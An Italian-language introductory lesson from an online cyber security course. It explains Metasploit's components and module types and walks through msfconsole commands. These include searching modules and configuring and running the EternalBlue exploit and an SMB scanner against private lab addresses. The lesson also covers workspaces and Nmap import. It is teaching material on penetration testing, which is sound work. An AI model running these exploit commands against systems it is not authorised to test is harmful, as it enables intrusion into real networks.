Architettura di Metasploit e msfconsole
Imparate a usare msfconsole, comprendete la struttura di exploit, payload e moduli e configurate le opzioni.
Architettura di Metasploit e msfconsole è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 1 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.
Che cos'è Metasploit?
Metasploit Framework è una piattaforma open source per i penetration test che offre un'interfaccia unificata per sviluppare, testare ed eseguire exploit. È lo strumento standard del settore per lo sfruttamento autorizzato in ambienti di laboratorio.
Componenti di Metasploit
Componenti principali: msfconsole (CLI interattiva), msfvenom (generatore di payload), Metasploit DB (PostgreSQL per memorizzare host e sessioni) e Armitage (front-end con interfaccia grafica).
Avvio di msfconsole
Avvii msfconsole e inizializzi il database. Il prompt cambia in msf6 >. Il completamento tramite il tasto Tab funziona per tutti i comandi, i nomi dei moduli e le opzioni.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.Tipi di moduli
Metasploit organizza le funzionalità in diversi tipi di moduli: exploit (codice di attacco specifico per una vulnerabilità), payload (codice eseguito dopo lo sfruttamento), auxiliary (scanner e fuzzer), post (post-sfruttamento), encoder e nop.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesRicerca dei moduli
Il comando search filtra i moduli per nome, CVE, piattaforma o livello. Il livello del modulo indica l'affidabilità: Excellent > Great > Good > Normal > Average > Low.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17Utilizzo di un modulo exploit
Selezioni un modulo con use, visualizzi le opzioni richieste con show options, imposti i valori con set ed esegua il modulo con run o exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runImpostazione delle opzioni globali
setg imposta globalmente le opzioni per tutti i moduli successivi: è utile per LHOST, LPORT e RHOSTS, che rimangono costanti per tutta l'attività.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTModuli auxiliary
I moduli auxiliary eseguono scansioni, attività di enumerazione e fuzzing senza fornire payload. Esempi: scanner della versione SMB, forza bruta degli accessi SSH e scanner delle directory HTTP.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runGestione dei workspace
I workspace organizzano i dati delle scansioni e le sessioni per ogni attività. Crei un nuovo workspace all'inizio di ogni valutazione per mantenere separati i dati.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesIntegrazione con Nmap
Importi direttamente in Metasploit i risultati delle scansioni XML di Nmap per popolare le tabelle degli host e dei servizi, consentendo di selezionare moduli mirati.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445Guida e documentazione
Ogni modulo dispone di documentazione integrata. Utilizzi info per leggere la descrizione del modulo, la valutazione dell'affidabilità, i riferimenti (CVE, advisory) e le opzioni richieste.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankVerifica rapida
Quale comando seleziona un modulo in msfconsole?
Riepilogo: architettura di Metasploit
msfconsole è il punto centrale: cerchi i moduli, imposti le opzioni, esegua gli exploit e gestisca le sessioni. Operi sempre all'interno di un workspace denominato, importi i risultati di Nmap per popolare il database e legga le informazioni del modulo prima di eseguire qualsiasi operazione: comprenda che cosa sta eseguendo e perché.
Domande Frequenti
La lezione «Architettura di Metasploit e msfconsole» è gratuita?
Sì — il testo completo di «Architettura di Metasploit e msfconsole» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.
Cosa imparerò in «Architettura di Metasploit e msfconsole»?
Imparate a usare msfconsole, comprendete la struttura di exploit, payload e moduli e configurate le opzioni. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cyber Security Academy?
Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 1 di 4.
Quanto tempo richiede la lezione «Architettura di Metasploit e msfconsole»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?
Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Architettura di Metasploit e msfconsole
- Sfruttare una vulnerabilità nota
- Payload: staged e stageless, Meterpreter
- Post-exploitation: pivoting e persistenza